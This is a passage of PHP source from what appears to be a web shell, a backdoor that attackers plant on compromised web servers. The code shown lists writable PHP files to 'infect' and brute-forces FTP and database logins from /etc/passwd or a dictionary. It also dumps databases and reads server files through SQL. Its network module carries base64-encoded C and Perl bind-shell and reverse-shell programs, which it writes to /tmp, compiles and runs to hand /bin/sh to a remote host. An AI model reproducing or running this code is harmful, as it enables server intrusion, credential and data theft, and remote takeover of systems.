1160 $nFile = substr($file, -4, 4);
1161 if($nFile == ".php" ){
1162 if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
1163 echo "$file<br>";
1164 $i++;
1165 }
1166 }
1167 }
1168 echo "<font color=red size=14>$i</font>";
1169 }else{
1170 echo "<form method=post><input type=submit value=Infect name=infet></form>";
1171 echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
1172 }
1173 hardFooter();
1174}
1175function actionBruteforce() {
1176 hardHeader();
1177 if( isset($_POST['proto']) ) {
1178 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1179 if( $_POST['proto'] == 'ftp' ) {
1180 function bruteForce($ip,$port,$login,$pass) {
1181 $fp = @ftp_connect($ip, $port?$port:21);
1182 if(!$fp) return false;
1183 $res = @ftp_login($fp, $login, $pass);
1184 @ftp_close($fp);
1185 return $res;
1186 }
1187 } elseif( $_POST['proto'] == 'mysql' ) {
1188 function bruteForce($ip,$port,$login,$pass) {
1189 $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);
1190 @mysql_close($res);
1191 return $res;
1192 }
1193 } elseif( $_POST['proto'] == 'pgsql' ) {
1194 function bruteForce($ip,$port,$login,$pass) {
1195 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
1196 $res = @pg_connect($str);
1197 @pg_close($res);
1198 return $res;
1199 }
1200 }
1201 $success = 0;
1202 $attempts = 0;
1203 $server = explode(":", $_POST['server']);
1204 if($_POST['type'] == 1) {
1205 $temp = @file('/etc/passwd');
1206 if( is_array($temp) )
1207 foreach($temp as $line) {
1208 $line = explode(":", $line);
1209 ++$attempts;
1210 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1211 $success++;
1212 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1213 }
1214 if(@$_POST['reverse']) {
1215 $tmp = "";
1216 for($i=strlen($line[0])-1; $i>=0; --$i)
1217 $tmp .= $line[0][$i];
1218 ++$attempts;
1219 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1220 $success++;
1221 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1222 }
1223 }
1224 }
1225 } elseif($_POST['type'] == 2) {
1226 $temp = @file($_POST['dict']);
1227 if( is_array($temp) )
1228 foreach($temp as $line) {
1229 $line = trim($line);
1230 ++$attempts;
1231 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1232 $success++;
1233 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1234 }
1235 }
1236 }
1237 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1238 }
1239 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1240 .'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>'
1241 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1242 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1243 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1244 .'<input type=hidden name=ne value="">'
1245 .'<span>Server:port</span></td>'
1246 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1247 .'<tr><td><span>Brute type</span></td>'
1248 .'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>'
1249 .'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>'
1250 .'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>'
1251 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1252 .'<td><input type=text name=login value="root"></td></tr>'
1253 .'<tr><td><span>Dictionary</span></td>'
1254 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1255 .'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';
1256 echo '</div>';
1257 hardFooter();
1258}
1259function actionSql() {
1260 class DbClass {
1261 var $type;
1262 var $link;
1263 var $res;
1264 function DbClass($type) {
1265 $this->type = $type;
1266 }
1267 function connect($host, $user, $pass, $dbname){
1268 switch($this->type) {
1269 case 'mysql':
1270 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1271 break;
1272 case 'pgsql':
1273 $host = explode(':', $host);
1274 if(!$host[1]) $host[1]=5432;
1275 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1276 break;
1277 }
1278 return false;
1279 }
1280 function selectdb($db) {
1281 switch($this->type) {
1282 case 'mysql':
1283 if (@mysql_select_db($db))return true;
1284 break;
1285 }
1286 return false;
1287 }
1288 function query($str) {
1289 switch($this->type) {
1290 case 'mysql':
1291 return $this->res = @mysql_query($str);
1292 break;
1293 case 'pgsql':
1294 return $this->res = @pg_query($this->link,$str);
1295 break;
1296 }
1297 return false;
1298 }
1299 function fetch() {
1300 $res = func_num_args()?func_get_arg(0):$this->res;
1301 switch($this->type) {
1302 case 'mysql':
1303 return @mysql_fetch_assoc($res);
1304 break;
1305 case 'pgsql':
1306 return @pg_fetch_assoc($res);
1307 break;
1308 }
1309 return false;
1310 }
1311 function listDbs() {
1312 switch($this->type) {
1313 case 'mysql':
1314 return $this->query("SHOW databases");
1315 break;
1316 case 'pgsql':
1317 return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1318 break;
1319 }
1320 return false;
1321 }
1322 function listTables() {
1323 switch($this->type) {
1324 case 'mysql':
1325 return $this->res = $this->query('SHOW TABLES');
1326 break;
1327 case 'pgsql':
1328 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1329 break;
1330 }
1331 return false;
1332 }
1333 function error() {
1334 switch($this->type) {
1335 case 'mysql':
1336 return @mysql_error();
1337 break;
1338 case 'pgsql':
1339 return @pg_last_error();
1340 break;
1341 }
1342 return false;
1343 }
1344 function setCharset($str) {
1345 switch($this->type) {
1346 case 'mysql':
1347 if(function_exists('mysql_set_charset'))
1348 return @mysql_set_charset($str, $this->link);
1349 else
1350 $this->query('SET CHARSET '.$str);
1351 break;
1352 case 'pgsql':
1353 return @pg_set_client_encoding($this->link, $str);
1354 break;
1355 }
1356 return false;
1357 }
1358 function loadFile($str) {
1359 switch($this->type) {
1360 case 'mysql':
1361 return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1362 break;
1363 case 'pgsql':
1364 $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;");
1365 $r=array();
1366 while($i=$this->fetch())
1367 $r[] = $i['file'];
1368 $this->query('drop table hard2');
1369 return array('file'=>implode("\n",$r));
1370 break;
1371 }
1372 return false;
1373 }
1374 function dump($table, $fp = false) {
1375 switch($this->type) {
1376 case 'mysql':
1377 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1378 $create = mysql_fetch_array($res);
1379 $sql = $create[1].";\n";
1380 if($fp) fwrite($fp, $sql); else echo($sql);
1381 $this->query('SELECT * FROM `'.$table.'`');
1382 $i = 0;
1383 $head = true;
1384 while($▟ = $this->fetch()) {
1385 $sql = '';
1386 if($i % 1000 == 0) {
1387 $head = true;
1388 $sql = ";\n\n";
1389 }
1390 $columns = array();
1391 foreach($▟ as $k=>$v) {
1392 if($v === null)
1393 $▟[$k] = "NULL";
1394 elseif(is_int($v))
1395 $▟[$k] = $v;
1396 else
1397 $▟[$k] = "'".@mysql_real_escape_string($v)."'";
1398 $columns[] = "`".$k."`";
1399 }
1400 if($head) {
1401 $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $▟).')';
1402 $head = false;
1403 } else
1404 $sql .= "\n\t,(".implode(", ", $▟).')';
1405 if($fp) fwrite($fp, $sql); else echo($sql);
1406 $i++;
1407 }
1408 if(!$head)
1409 if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
1410 break;
1411 case 'pgsql':
1412 $this->query('SELECT * FROM '.$table);
1413 while($▟ = $this->fetch()) {
1414 $columns = array();
1415 foreach($▟ as $k=>$v) {
1416 $▟[$k] = "'".addslashes($v)."'";
1417 $columns[] = $k;
1418 }
1419 $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $▟).');'."\n";
1420 if($fp) fwrite($fp, $sql); else echo($sql);
1421 }
1422 break;
1423 }
1424 return false;
1425 }
1426 };
1427 $db = new DbClass($_POST['type']);
1428 if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
1429 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1430 $db->selectdb($_POST['sql_base']);
1431 switch($_POST['charset']) {
1432 case "Windows-1251": $db->setCharset('cp1251'); break;
1433 case "UTF-8": $db->setCharset('utf8'); break;
1434 case "KOI8-R": $db->setCharset('koi8r'); break;
1435 case "KOI8-U": $db->setCharset('koi8u'); break;
1436 case "cp866": $db->setCharset('cp866'); break;
1437 }
1438 if(empty($_POST['file'])) {
1439 ob_start("ob_gzhandler", 4096);
1440 header("Content-Disposition: attachment; filename=dump.sql");
1441 header("Content-Type: text/plain");
1442 foreach($_POST['tbl'] as $v)
1443 $db->dump($v);
1444 exit;
1445 } elseif($fp = @fopen($_POST['file'], 'w')) {
1446 foreach($_POST['tbl'] as $v)
1447 $db->dump($v, $fp);
1448 fclose($fp);
1449 unset($_POST['p2']);
1450 } else
1451 die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1452 }
1453 hardHeader();
1454 echo "
1455<h1>Sql browser</h1><div class=content>
1456<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1457<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1458<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
1459<td><label><select name='type'><option value='mysql' ";
1460 if(@$_POST['type']=='mysql')echo 'selected';
1461echo ">MySql</option><option value='pgsql' ";
1462if(@$_POST['type']=='pgsql')echo 'selected';
1463echo ">PostgreSql</option></select></label></td>
1464<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
1465<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
1466<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\" required></td><td>";
1467 $tmp = "<input type=text name=sql_base value=''>";
1468 if(isset($_POST['sql_host'])){
1469 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1470 switch($_POST['charset']) {
1471 case "Windows-1251": $db->setCharset('cp1251'); break;
1472 case "UTF-8": $db->setCharset('utf8'); break;
1473 case "KOI8-R": $db->setCharset('koi8r'); break;
1474 case "KOI8-U": $db->setCharset('koi8u'); break;
1475 case "cp866": $db->setCharset('cp866'); break;
1476 }
1477 $db->listDbs();
1478 echo "<label><select name=sql_base><option value=''></option>";
1479 while($▟ = $db->fetch()) {
1480 list($key, $value) = each($▟);
1481 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1482 }
1483 echo '</select></label>';
1484 }
1485 else echo $tmp;
1486 }else
1487 echo $tmp;
1488 echo "</td>
1489 <td><input type=submit value='submit' onclick='fs(d.sf);'></td>
1490 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
1491 </tr>
1492 </table>
1493 <script>
1494 s_db='".@addslashes($_POST['sql_base'])."';
1495 function fs(f) {
1496 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1497 if(f.p1) f.p1.value='';
1498 if(f.p2) f.p2.value='';
1499 if(f.p3) f.p3.value='';
1500 }
1501 }
1502 function st(t,l) {
1503 d.sf.p1.value = 'select';
1504 d.sf.p2.value = t;
1505 if(l && d.sf.p3) d.sf.p3.value = l;
1506 d.sf.submit();
1507 }
1508 function is() {
1509 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1510 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1511 }
1512 </script>";
1513 if(isset($db) && $db->link){
1514 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1515 if(!empty($_POST['sql_base'])){
1516 $db->selectdb($_POST['sql_base']);
1517 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1518 $tbls_res = $db->listTables();
1519 while($▟ = $db->fetch($tbls_res)) {
1520 list($key, $value) = each($▟);
1521 if(!empty($_POST['sql_count']))
1522 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1523 $value = htmlspecialchars($value);
1524 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>";
1525 }
1526 echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1527 if(@$_POST['p1'] == 'select') {
1528 $_POST['p1'] = 'query';
1529 $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1530 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1531 $num = $db->fetch();
1532 $pages = ceil($num['n'] / 30);
1533 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1534 echo " of $pages";
1535 if($_POST['p3'] > 1)
1536 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
1537 if($_POST['p3'] < $pages)
1538 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
1539 $_POST['p3']--;
1540 if($_POST['type']=='pgsql')
1541 $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1542 else
1543 $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1544 echo "<br><br>";
1545 }
1546 if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1547 $db->query(@$_POST['p2']);
1548 if($db->res !== false) {
1549 $title = false;
1550 echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';
1551 $line = 1;
1552 while($▟ = $db->fetch()) {
1553 if(!$title) {
1554 echo '<tr>';
1555 foreach($▟ as $key => $value)
1556 echo '<th>'.$key.'</th>';
1557 reset($▟);
1558 $title=true;
1559 echo '</tr><tr>';
1560 $line = 2;
1561 }
1562 echo '<tr class="l'.$line.'">';
1563 $line = $line==1?2:1;
1564 foreach($▟ as $key => $value) {
1565 if($value == null)
1566 echo '<td><i>null</i></td>';
1567 else
1568 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1569 }
1570 echo '</tr>';
1571 }
1572 echo '</table>';
1573 } else {
1574 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1575 }
1576 }
1577 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1578 if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
1579 echo htmlspecialchars($_POST['p2']);
1580 echo "</textarea><br/><input type=submit value='Execute'>";
1581 echo "</td></tr>";
1582 }
1583 echo "</table></form><br/>";
1584 if($_POST['type']=='mysql') {
1585 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1586 if($db->fetch())
1587 echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='submit'></form>";
1588 }
1589 if(@$_POST['p1'] == 'loadfile') {
1590 $file = $db->loadFile($_POST['p2']);
1591 echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1592 }
1593 } else {
1594 echo htmlspecialchars($db->error());
1595 }
1596 echo '</div>';
1597 hardFooter();
1598}
1599function actionNetwork() {
1600 hardHeader();
1601 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1602 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1603 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1604 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1605 echo "<h1>Network tools</h1><div class=content>
1606 <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
1607 <span>Bind port to /bin/sh</span><br/>
1608 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
1609 </form>
1610 <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
1611 <span>Back-connect to</span><br/>
1612 Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
1613 </form><br>";
1614 if(isset($_POST['p1'])) {
1615 function cf($f,$t) {
1616 $w=@fopen($f,"w") or @function_exists('file_put_contents');
1617 if($w) {
1618 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1619 @fclose($w);
1620 }
1621 }
1622 if($_POST['p1'] == 'bpc') {
1623 cf("/tmp/bp.c",$bind_port_c);
1624 $▖ = ex("gcc -o /tmp/bp /tmp/bp.c");
1625 @unlink("/tmp/bp.c");
1626 $▖ .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1627 echo "<pre class=ml1>$▖".ex("ps aux | grep bp")."</pre>";
1628 }
1629 if($_POST['p1'] == 'bpp') {
1630 cf("/tmp/bp.pl",$bind_port_p);
1631 $▖ = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1632 echo "<pre class=ml1>$▖".ex("ps aux | grep bp.pl")."</pre>";
1633 }
1634 if($_POST['p1'] == 'bcc') {
1635 cf("/tmp/bc.c",$back_connect_c);
1636 $▖ = ex("gcc -o /tmp/bc /tmp/bc.c");
1637 @unlink("/tmp/bc.c");
1638 $▖ .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1639 echo "<pre class=ml1>$▖".ex("ps aux | grep bc")."</pre>";
1640 }
1641 if($_POST['p1'] == 'bcp') {
1642 cf("/tmp/bc.pl",$back_connect_p);
1643 $▖ = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1644 echo "<pre class=ml1>$▖".ex("ps aux | grep bc.pl")."</pre>";
1645 }
1646 }
1647 echo '</div>';
1648 hardFooter();
1649}
1650if( empty($_POST['a']) )
1651 if(isset($▚) && function_exists('action' . $▚))
1652 $_POST['a'] = $▚;
1653 else
1654 $_POST['a'] = 'FilesMan';
1655if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
1656 call_user_func('action' . $_POST['a']);
1657?>